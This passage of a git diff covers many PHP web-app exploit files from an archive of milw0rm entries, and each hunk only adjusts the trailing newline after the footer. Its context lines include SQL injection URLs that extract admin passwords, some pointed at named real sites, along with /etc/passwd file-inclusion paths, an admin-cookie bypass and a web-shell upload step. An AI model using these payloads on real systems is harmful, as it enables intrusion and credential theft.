b/platforms/php/webapps/9325.txt @@ -22,4 +22,4 @@ ########################################################################################################################################### -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9326.txt b/platforms/php/webapps/9326.txt index d68f64cd1..1cd632452 100755 --- a/platforms/php/webapps/9326.txt +++ b/platforms/php/webapps/9326.txt @@ -28,4 +28,4 @@ ############################################################################################################## -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9327.txt b/platforms/php/webapps/9327.txt index aa40b0d79..6e05265ee 100755 --- a/platforms/php/webapps/9327.txt +++ b/platforms/php/webapps/9327.txt @@ -82,4 +82,4 @@ http://WWW.Site.Com/goldv3/show.php?cat=msgs&catid=-1'+union+select+1,2,adminpas |+------------------------------------------------+ | \---------------------------------------------------/ -# milw0rm.com [2009-08-01] +# milw0rm.com [2009-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/9331.txt b/platforms/php/webapps/9331.txt index c991ad2f9..1d52281ac 100755 --- a/platforms/php/webapps/9331.txt +++ b/platforms/php/webapps/9331.txt @@ -19,4 +19,4 @@ http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea] |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD| |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN| -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9332.txt b/platforms/php/webapps/9332.txt index f2ba5be5d..36c36f08f 100755 --- a/platforms/php/webapps/9332.txt +++ b/platforms/php/webapps/9332.txt @@ -12,4 +12,4 @@ or any user Buy Script: http://junglescripts.com/short_urls.php Admin login Demo: http://href.in/x/login -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9333.txt b/platforms/php/webapps/9333.txt index 44604529e..f2e96155c 100755 --- a/platforms/php/webapps/9333.txt +++ b/platforms/php/webapps/9333.txt @@ -23,4 +23,4 @@ if($selLang!=""){ ############################################################################################ -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9334.txt b/platforms/php/webapps/9334.txt index 16bbe36c8..ce29c2fa1 100755 --- a/platforms/php/webapps/9334.txt +++ b/platforms/php/webapps/9334.txt @@ -33,4 +33,4 @@ die(); ##################################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9335.txt b/platforms/php/webapps/9335.txt index 652ae4987..763406db0 100755 --- a/platforms/php/webapps/9335.txt +++ b/platforms/php/webapps/9335.txt @@ -20,4 +20,4 @@ ######################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9336.txt b/platforms/php/webapps/9336.txt index d4604dc7e..0a42a7bbf 100755 --- a/platforms/php/webapps/9336.txt +++ b/platforms/php/webapps/9336.txt @@ -18,4 +18,4 @@ #################################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9337.txt b/platforms/php/webapps/9337.txt index 5fdc13d5f..d39353370 100755 --- a/platforms/php/webapps/9337.txt +++ b/platforms/php/webapps/9337.txt @@ -16,4 +16,4 @@ ################################################################## -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9338.txt b/platforms/php/webapps/9338.txt index 02f0b7213..b75e1c604 100755 --- a/platforms/php/webapps/9338.txt +++ b/platforms/php/webapps/9338.txt @@ -49,4 +49,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9339.txt b/platforms/php/webapps/9339.txt index a894c2830..a159937dc 100755 --- a/platforms/php/webapps/9339.txt +++ b/platforms/php/webapps/9339.txt @@ -47,4 +47,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9340.txt b/platforms/php/webapps/9340.txt index d241093b9..07cb2636d 100755 --- a/platforms/php/webapps/9340.txt +++ b/platforms/php/webapps/9340.txt @@ -56,4 +56,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9341.txt b/platforms/php/webapps/9341.txt index 54eece20d..54c7a4a77 100755 --- a/platforms/php/webapps/9341.txt +++ b/platforms/php/webapps/9341.txt @@ -16,4 +16,4 @@ #Password:Super Cristal ---------------------------------------------------------- -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9342.txt b/platforms/php/webapps/9342.txt index 990ec659a..d5322dd9f 100755 --- a/platforms/php/webapps/9342.txt +++ b/platforms/php/webapps/9342.txt @@ -52,4 +52,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9344.txt b/platforms/php/webapps/9344.txt index 2455ba51c..234b43783 100755 --- a/platforms/php/webapps/9344.txt +++ b/platforms/php/webapps/9344.txt @@ -31,4 +31,4 @@ > > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil > > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .# -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9347.txt b/platforms/php/webapps/9347.txt index 6ce601115..9a00918f2 100755 --- a/platforms/php/webapps/9347.txt +++ b/platforms/php/webapps/9347.txt @@ -78,4 +78,4 @@ Use a diffrent method for direct access authentication. ````````````````` Salamz to All Muslim Hackers. -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9348.txt b/platforms/php/webapps/9348.txt index bee2a7970..d006e044d 100755 --- a/platforms/php/webapps/9348.txt +++ b/platforms/php/webapps/9348.txt @@ -77,4 +77,4 @@ No fix. *************************************************** -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9349.txt b/platforms/php/webapps/9349.txt index 1b1f7e0d4..9b0605abc 100755 --- a/platforms/php/webapps/9349.txt +++ b/platforms/php/webapps/9349.txt @@ -69,4 +69,4 @@ $more = intval($_GET['more']); *************************************************** -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9350.txt b/platforms/php/webapps/9350.txt index e13f2677a..200cd3556 100755 --- a/platforms/php/webapps/9350.txt +++ b/platforms/php/webapps/9350.txt @@ -38,4 +38,4 @@ Thanx To / _____ \ | `----./ _____ \ | '--' || |____ | | | | | | /__/ \__\ \______/__/ \__\ |_______/ |_______||__| |__| |__| Tryag.Cc -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9351.txt b/platforms/php/webapps/9351.txt index 2dab97cbb..97cb09e11 100755 --- a/platforms/php/webapps/9351.txt +++ b/platforms/php/webapps/9351.txt @@ -40,4 +40,4 @@ http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100 [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2009-08-03] +# milw0rm.com [2009-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/9353.txt b/platforms/php/webapps/9353.txt index 552142dae..ea3764bfd 100755 --- a/platforms/php/webapps/9353.txt +++ b/platforms/php/webapps/9353.txt @@ -22,4 +22,4 @@ ######################################################################### -# milw0rm.com [2009-08-04] +# milw0rm.com [2009-08-04] \ No newline at end of file diff --git a/platforms/php/webapps/9355.txt b/platforms/php/webapps/9355.txt index 14caba075..c3bd9ba71 100755 --- a/platforms/php/webapps/9355.txt +++ b/platforms/php/webapps/9355.txt @@ -30,4 +30,4 @@ Vulnerability Code: !include($view_location . "{$viewtype}/{$view}.php")) { ----------------------------------------------------------------------- -# milw0rm.com [2009-08-04] +# milw0rm.com [2009-08-04] \ No newline at end of file diff --git a/platforms/php/webapps/9356.txt b/platforms/php/webapps/9356.txt index 7f91ec59f..14185dc46 100755 --- a/platforms/php/webapps/9356.txt +++ b/platforms/php/webapps/9356.txt @@ -34,4 +34,4 @@ exp: BLND ~~~~~~> http://www.xxx.com:80/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+ -# milw0rm.com [2009-08-04] +# milw0rm.com [2009-08-04] \ No newline at end of file diff --git a/platforms/php/webapps/9358.txt b/platforms/php/webapps/9358.txt index 020e6f0ad..537602f50 100755 --- a/platforms/php/webapps/9358.txt +++ b/platforms/php/webapps/9358.txt @@ -33,4 +33,4 @@ {o}===================================================================================={o} -# milw0rm.com [2009-08-04] +# milw0rm.com [2009-08-04] \ No newline at end of file diff --git a/platforms/php/webapps/9365.txt b/platforms/php/webapps/9365.txt index ececb9b3b..16648d172 100755 --- a/platforms/php/webapps/9365.txt +++ b/platforms/php/webapps/9365.txt @@ -21,4 +21,4 @@ ################################################################################################ -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9367.txt b/platforms/php/webapps/9367.txt index ba17646be..96dd3bdec 100755 --- a/platforms/php/webapps/9367.txt +++ b/platforms/php/webapps/9367.txt @@ -37,4 +37,4 @@ ######################################################################### -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9369.txt b/platforms/php/webapps/9369.txt index bf0094fa1..73f4fbaa2 100755 --- a/platforms/php/webapps/9369.txt +++ b/platforms/php/webapps/9369.txt @@ -70,4 +70,4 @@ http://localhost/cms/ru/news/7'+union+select+1,2,concat_ws(0x3a,login,pass),4,5, [+]------------------------------------------------[/CODE]-------------------------------------------------------------[+] -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9370.txt b/platforms/php/webapps/9370.txt index ccd49b027..5006851f3 100755 --- a/platforms/php/webapps/9370.txt +++ b/platforms/php/webapps/9370.txt @@ -42,4 +42,4 @@ Greetings : Mizoz, Zuka, str0ke, 599eme Man. http://ipod.accessories.me.uk/browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=1 TRUE http://ipod.accessories.me.uk/browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=2 FALSE -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9371.txt b/platforms/php/webapps/9371.txt index f7c084185..56ea8eb5c 100755 --- a/platforms/php/webapps/9371.txt +++ b/platforms/php/webapps/9371.txt @@ -39,4 +39,4 @@ #################################################################### -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9372.txt b/platforms/php/webapps/9372.txt index 758844572..0723eb270 100755 --- a/platforms/php/webapps/9372.txt +++ b/platforms/php/webapps/9372.txt @@ -47,4 +47,4 @@ etc, etc.... #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-08-05] +# milw0rm.com [2009-08-05] \ No newline at end of file diff --git a/platforms/php/webapps/9378.txt b/platforms/php/webapps/9378.txt index 379ede4c0..55e419f07 100755 --- a/platforms/php/webapps/9378.txt +++ b/platforms/php/webapps/9378.txt @@ -52,4 +52,4 @@ Write some Javascript/HTML Code into the $_POST sections. Have Fun! -# milw0rm.com [2009-08-06] +# milw0rm.com [2009-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/9380.txt b/platforms/php/webapps/9380.txt index 5e5ddb91b..6ae43a199 100755 --- a/platforms/php/webapps/9380.txt +++ b/platforms/php/webapps/9380.txt @@ -30,4 +30,4 @@ Admin Panel: /typo3/index.php #----- -# milw0rm.com [2009-08-06] +# milw0rm.com [2009-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/9383.txt b/platforms/php/webapps/9383.txt index bf2bc0c29..5ef359abf 100755 --- a/platforms/php/webapps/9383.txt +++ b/platforms/php/webapps/9383.txt @@ -36,4 +36,4 @@ _______ ___________ [=] -# milw0rm.com [2009-08-06] +# milw0rm.com [2009-08-06] \ No newline at end of file diff --git a/platforms/php/webapps/9384.txt b/platforms/php/webapps/9384.txt index a7e66f75e..0b5386349 100755 --- a/platforms/php/webapps/9384.txt +++ b/platforms/php/webapps/9384.txt @@ -64,4 +64,4 @@ http://WWW.Site.Com/alwasel/xml.php?page=cat&id=-1+union+select+1,version(),3,4, |+------------------------------------------------+ | \---------------------------------------------------/ -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9385.txt b/platforms/php/webapps/9385.txt index 53e529934..ead8a6deb 100755 --- a/platforms/php/webapps/9385.txt +++ b/platforms/php/webapps/9385.txt @@ -35,4 +35,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9387.txt b/platforms/php/webapps/9387.txt index e96811c67..599e92a3f 100755 --- a/platforms/php/webapps/9387.txt +++ b/platforms/php/webapps/9387.txt @@ -35,4 +35,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9389.txt b/platforms/php/webapps/9389.txt index 8b9fa0229..4abf5a2c4 100755 --- a/platforms/php/webapps/9389.txt +++ b/platforms/php/webapps/9389.txt @@ -45,4 +45,4 @@ Bekleyin beni! ----Note---- -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/939.pl b/platforms/php/webapps/939.pl index eeb3f3333..bfbc6f96a 100755 --- a/platforms/php/webapps/939.pl +++ b/platforms/php/webapps/939.pl @@ -61,4 +61,4 @@ print "# Login: $login\n"; print "# Pass Hash: $pass\n"; print "\n"; -# milw0rm.com [2005-04-13] +# milw0rm.com [2005-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/9390.txt b/platforms/php/webapps/9390.txt index ec8a7e711..51cf57b8b 100755 --- a/platforms/php/webapps/9390.txt +++ b/platforms/php/webapps/9390.txt @@ -32,4 +32,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9394.pl b/platforms/php/webapps/9394.pl index 121e7f6d6..e9f9aac8f 100755 --- a/platforms/php/webapps/9394.pl +++ b/platforms/php/webapps/9394.pl @@ -209,4 +209,4 @@ elsif opt=="2" puts "\nHave fun :)" end -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9395.txt b/platforms/php/webapps/9395.txt index cc0d5244b..e93be0ffc 100755 --- a/platforms/php/webapps/9395.txt +++ b/platforms/php/webapps/9395.txt @@ -22,4 +22,4 @@ Demo: http://phpcityportal.com/demo/login.php ****************************************************************************************** -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9396.txt b/platforms/php/webapps/9396.txt index 795cef6e0..6c25fe883 100755 --- a/platforms/php/webapps/9396.txt +++ b/platforms/php/webapps/9396.txt @@ -47,4 +47,4 @@ LFI => invalid../../../../../../../../../../etc/passwd/././././././././././././. - Poc: http://127.0.0.1/index.php?lng=[RFI] -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9397.txt b/platforms/php/webapps/9397.txt index 8e70cc816..fa6addb4c 100755 --- a/platforms/php/webapps/9397.txt +++ b/platforms/php/webapps/9397.txt @@ -57,4 +57,4 @@ LFI => ../../../../../../../../../../etc/passwd/././././././././././././././././ http://127.0.0.1/newticket.php?lang=[RFI] http://127.0.0.1/rempass.php?lang=[RFI] -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9398.php b/platforms/php/webapps/9398.php index 841d581cd..1f0c8fe22 100755 --- a/platforms/php/webapps/9398.php +++ b/platforms/php/webapps/9398.php @@ -91,4 +91,4 @@ function PostToHost($host, $path, $cookie, $data_to_send, $useragent) { ?> -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9399.txt b/platforms/php/webapps/9399.txt index e30bd573d..3f2d1a639 100755 --- a/platforms/php/webapps/9399.txt +++ b/platforms/php/webapps/9399.txt @@ -33,4 +33,4 @@ ######################################################################################################### -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9400.txt b/platforms/php/webapps/9400.txt index 0a1d67d52..1eb9f3ef3 100755 --- a/platforms/php/webapps/9400.txt +++ b/platforms/php/webapps/9400.txt @@ -37,4 +37,4 @@ http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0 thanks: str0ke and all friends -# milw0rm.com [2009-08-07] +# milw0rm.com [2009-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/9404.txt b/platforms/php/webapps/9404.txt index b15d5c65f..32919b1dc 100755 --- a/platforms/php/webapps/9404.txt +++ b/platforms/php/webapps/9404.txt @@ -25,4 +25,4 @@ Demo: http://www.smiliescript.com/demo ----- -# milw0rm.com [2009-08-10] +# milw0rm.com [2009-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/9405.txt b/platforms/php/webapps/9405.txt index 9ec0a4bd7..b6b017d3a 100755 --- a/platforms/php/webapps/9405.txt +++ b/platforms/php/webapps/9405.txt @@ -140,4 +140,4 @@ security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -# milw0rm.com [2009-08-10] +# milw0rm.com [2009-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/9406.txt b/platforms/php/webapps/9406.txt index 641bfe1ad..ee1a52ad1 100755 --- a/platforms/php/webapps/9406.txt +++ b/platforms/php/webapps/9406.txt @@ -42,4 +42,4 @@ http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_F [+]------------------------------------------------[/CODE]--------------------------------------------------------------[+] -# milw0rm.com [2009-08-10] +# milw0rm.com [2009-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/9407.txt b/platforms/php/webapps/9407.txt index c24e0a916..d7e59509c 100755 --- a/platforms/php/webapps/9407.txt +++ b/platforms/php/webapps/9407.txt @@ -28,4 +28,4 @@ L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64 #ihteam.net - Inclusion Hunter Team -# milw0rm.com [2009-08-10] +# milw0rm.com [2009-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/9408.php b/platforms/php/webapps/9408.php index 3fb5c9b30..8b08f3584 100755 --- a/platforms/php/webapps/9408.php +++ b/platforms/php/webapps/9408.php @@ -81,4 +81,4 @@ Note: */ ?> -# milw0rm.com [2009-08-10] +# milw0rm.com [2009-08-10] \ No newline at end of file diff --git a/platforms/php/webapps/9410.txt b/platforms/php/webapps/9410.txt index 5c7609657..1ef5f6cf4 100755 --- a/platforms/php/webapps/9410.txt +++ b/platforms/php/webapps/9410.txt @@ -129,4 +129,4 @@ with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. -# milw0rm.com [2009-08-11] +# milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/9413.txt b/platforms/php/webapps/9413.txt index 6cd385f6f..e8595043e 100755 --- a/platforms/php/webapps/9413.txt +++ b/platforms/php/webapps/9413.txt @@ -30,4 +30,4 @@ note: <version>v 1.1 (build 30)</version> <description>Blogs-system for Joomla 1.5</description> -# milw0rm.com [2009-08-11] +# milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/9416.txt b/platforms/php/webapps/9416.txt index 6d4f6bfeb..4477f6f24 100755 --- a/platforms/php/webapps/9416.txt +++ b/platforms/php/webapps/9416.txt @@ -23,4 +23,4 @@ script: machine.php 78 $result = mysql_query( $queryMachine, $_SESSION["readServer"] ) or mysql_error($_SESSION["readServer"]); 79 $item = mysql_fetch_object($result); -# milw0rm.com [2009-08-11] +# milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/platforms/php/webapps/9419.txt b/platforms/php/webapps/9419.txt index ff5ffd3d6..4bda69b09 100755 --- a/platforms/php/webapps/9419.txt +++ b/platforms/php/webapps/9419.txt @@ -39,4 +39,4 @@ Write in the URL: javascript:document.cookie="snickerdoodle=polarbears"; in the admin login you want to bypass or create the cookie with you favorite Firefox extension. -# milw0rm.com [2009-08-12] +# milw0rm.com [2009-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/9421.txt b/platforms/php/webapps/9421.txt index e08301d7c..b9fede682 100755 --- a/platforms/php/webapps/9421.txt +++ b/platforms/php/webapps/9421.txt @@ -23,4 +23,4 @@ side note: Original Advisory without poC : http://secunia.com/advisories/29399 -# milw0rm.com [2009-08-12] +# milw0rm.com [2009-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/9424.txt b/platforms/php/webapps/9424.txt index bd8327918..139eb248c 100755 --- a/platforms/php/webapps/9424.txt +++ b/platforms/php/webapps/9424.txt @@ -84,4 +84,4 @@ Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php -# milw0rm.com [2009-08-12] +# milw0rm.com [2009-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/9425.sh b/platforms/php/webapps/9425.sh index ffcffad1a..65f5d76ef 100755 --- a/platforms/php/webapps/9425.sh +++ b/platforms/php/webapps/9425.sh @@ -54,4 +54,4 @@ do echo done -# milw0rm.com [2009-08-12] +# milw0rm.com [2009-08-12] \ No newline at end of file diff --git a/platforms/php/webapps/9430.pl b/platforms/php/webapps/9430.pl index 70ad4013f..6df7f850d 100755 --- a/platforms/php/webapps/9430.pl +++ b/platforms/php/webapps/9430.pl @@ -123,4 +123,4 @@ BANNER } -# milw0rm.com [2009-08-13] +# milw0rm.com [2009-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/9431.txt b/platforms/php/webapps/9431.txt index 42b80efcb..3278706d8 100755 --- a/platforms/php/webapps/9431.txt +++ b/platforms/php/webapps/9431.txt @@ -155,4 +155,4 @@ Connection: close # ~ - [ [ : Inj3ct0r : ] ] -# milw0rm.com [2009-08-13] +# milw0rm.com [2009-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/9433.txt b/platforms/php/webapps/9433.txt index 2cdbfc2e5..e11cafbc6 100755 --- a/platforms/php/webapps/9433.txt +++ b/platforms/php/webapps/9433.txt @@ -36,4 +36,4 @@ http://localhost/Ananta_Gazelle1.0/user/File/shell.php [!] bEST wISHES -# milw0rm.com [2009-08-13] +# milw0rm.com [2009-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/9434.txt b/platforms/php/webapps/9434.txt index c8f2559c3..274b86032 100755 --- a/platforms/php/webapps/9434.txt +++ b/platforms/php/webapps/9434.txt @@ -158,4 +158,4 @@ ################################################################# ################################################################# -# milw0rm.com [2009-08-13] +# milw0rm.com [2009-08-13] \ No newline at end of file diff --git a/platforms/php/webapps/9437.txt b/platforms/php/webapps/9437.txt index 2743fe4dc..387ee9bf5 100755 --- a/platforms/php/webapps/9437.txt +++ b/platforms/php/webapps/9437.txt @@ -21,4 +21,4 @@ # # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-08-14] +# milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/php/webapps/9438.txt b/platforms/php/webapps/9438.txt index dc88ff508..dd2332480 100755 --- a/platforms/php/webapps/9438.txt +++ b/platforms/php/webapps/9438.txt @@ -36,4 +36,4 @@ You can to find other vulne in other files :)) ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-14] +# milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/php/webapps/9440.txt b/platforms/php/webapps/9440.txt index 8b2401a2d..a37e91d6c 100755 --- a/platforms/php/webapps/9440.txt +++ b/platforms/php/webapps/9440.txt @@ -23,4 +23,4 @@ Demo: http://www.cmsdemo.dsinternal.com/DetailFile.php?nFileId=-40+union+select+1,2,3,group_concat%28UserPass,0x3a,UserName%29,5,6+from+admin_user_info-- ----- -# milw0rm.com [2009-08-14] +# milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/php/webapps/9441.txt b/platforms/php/webapps/9441.txt index e1522c860..295990bf8 100755 --- a/platforms/php/webapps/9441.txt +++ b/platforms/php/webapps/9441.txt @@ -28,4 +28,4 @@ step3: upload shell.php enjoy :) -# milw0rm.com [2009-08-14] +# milw0rm.com [2009-08-14] \ No newline at end of file diff --git a/platforms/php/webapps/9444.txt b/platforms/php/webapps/9444.txt index c83df69aa..b03f03dba 100755 --- a/platforms/php/webapps/9444.txt +++ b/platforms/php/webapps/9444.txt @@ -30,4 +30,4 @@ PoC's: - http://www.scriptdemo.com/php-lance/advanced_search.php?in=../../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------------------------------- -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9445.py b/platforms/php/webapps/9445.py index 10cf71ce8..b0d012141 100755 --- a/platforms/php/webapps/9445.py +++ b/platforms/php/webapps/9445.py @@ -29,4 +29,4 @@ if data != '' : exit() print 'Attack failed.' -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9447.pl b/platforms/php/webapps/9447.pl index efbe8a5a5..5028668d5 100755 --- a/platforms/php/webapps/9447.pl +++ b/platforms/php/webapps/9447.pl @@ -50,4 +50,4 @@ else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; } -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9448.py b/platforms/php/webapps/9448.py index 2a0074302..f72fa55de 100755 --- a/platforms/php/webapps/9448.py +++ b/platforms/php/webapps/9448.py @@ -59,4 +59,4 @@ result.write(xml_content) result.close() print "[+] File saved " -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9450.txt b/platforms/php/webapps/9450.txt index 3f4c47f08..1e1961bbe 100755 --- a/platforms/php/webapps/9450.txt +++ b/platforms/php/webapps/9450.txt @@ -631,4 +631,4 @@ author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9451.txt b/platforms/php/webapps/9451.txt index 78b810323..dafdd31e4 100755 --- a/platforms/php/webapps/9451.txt +++ b/platforms/php/webapps/9451.txt @@ -34,4 +34,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9452.pl b/platforms/php/webapps/9452.pl index 8c402d0b4..cd84ee723 100755 --- a/platforms/php/webapps/9452.pl +++ b/platforms/php/webapps/9452.pl @@ -103,4 +103,4 @@ sub istrue2 } } -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9453.txt b/platforms/php/webapps/9453.txt index 8ae60c1c9..65e74f271 100755 --- a/platforms/php/webapps/9453.txt +++ b/platforms/php/webapps/9453.txt @@ -38,4 +38,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9459.txt b/platforms/php/webapps/9459.txt index 5698e170e..551142cb1 100755 --- a/platforms/php/webapps/9459.txt +++ b/platforms/php/webapps/9459.txt @@ -17,4 +17,4 @@ http://gateway.2wire.net/setup/password_required.html bugz -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9460.txt b/platforms/php/webapps/9460.txt index 590a49a64..42edc74b9 100755 --- a/platforms/php/webapps/9460.txt +++ b/platforms/php/webapps/9460.txt @@ -38,4 +38,4 @@ http://localhost/[path]/include/_bot.php?master[currentskin]=[AvriLhea] || ============================================================================================================ -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9461.txt b/platforms/php/webapps/9461.txt index 0dfdd51f1..9e2eb1102 100755 --- a/platforms/php/webapps/9461.txt +++ b/platforms/php/webapps/9461.txt @@ -31,4 +31,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9462.txt b/platforms/php/webapps/9462.txt index 6800fec6f..10a1661a0 100755 --- a/platforms/php/webapps/9462.txt +++ b/platforms/php/webapps/9462.txt @@ -58,4 +58,4 @@ http://www.alihammadi.com/html/?options[style_dir]=../../../../../../etc/named.c \---------------------------------------------------/ -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9463.php b/platforms/php/webapps/9463.php index c10ed42d8..178b081ce 